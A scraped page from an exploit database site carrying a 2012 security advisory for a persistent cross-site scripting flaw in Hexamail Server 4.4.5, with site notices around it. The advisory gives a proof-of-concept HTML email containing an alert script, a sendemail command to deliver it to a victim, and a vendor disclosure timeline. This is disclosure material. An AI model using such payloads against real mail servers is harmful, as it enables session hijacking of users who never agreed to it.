0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Author

modpr0be

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

#Title: Hexamail Server <= 4.4.5 Persistent XSS Vulnerability
#Date: June 3, 2012
#Author: modpr0be[at]Spentera, @modpr0be
#URL: http://www.spentera.com
#Software URL:http://www.hexamail.com/download/hexamailserversetup4.4.5.002.exe
#Tested on
#       OS: Windows XP SP3, Windows 2003 SP2, Windows 7 SP1
#       Browser: Chrome 19.0.x, IE9, Safari 5.1.7
 
Software Description
====================
Hexamail provides intelligent email software solutions. Leveraging the latest
advanced techniques, such as Bayesian matching, our products enable customers
to eliminate email intrusions such as spam, malware, spyware, phishing attacks
and virus.
 
Vulnerability Description
=========================
Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing
malicious user to execute scripts in a victim’s browser to hijack user sessions,
redirect users, and or hijack the user’s browser.
 
Proof of concept
================
By sending a malicious script to the victim email, the webmail automatically
load the mail body, so the script will be automatically executed without permission
from user.
 
root@bt:~/# cat > meal.txt
<html>
<body>
<h1>XSS pop up</h1>
<script>alert('Hi, what is this?');</script>
</body>
</html>
root@bt:~/#
 
Send email to the victim:
root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com \
-xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com
 
Vendor timeline
===============
04/20/2012 - Issue discovered
04/20/2012 - Vendor contacted
04/27/2012 - Vendor respond and provides new upgrade version
04/30/2012 - Issue still affected on the latest upgrade version
04/30/2012 - Vendor said they still fixing the problem
05/10/2012 - Email sent to ask about the fix progress
06/02/2012 - No response. Advisory published.



#  0day.today [2024-09-28]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Report Error

Report Error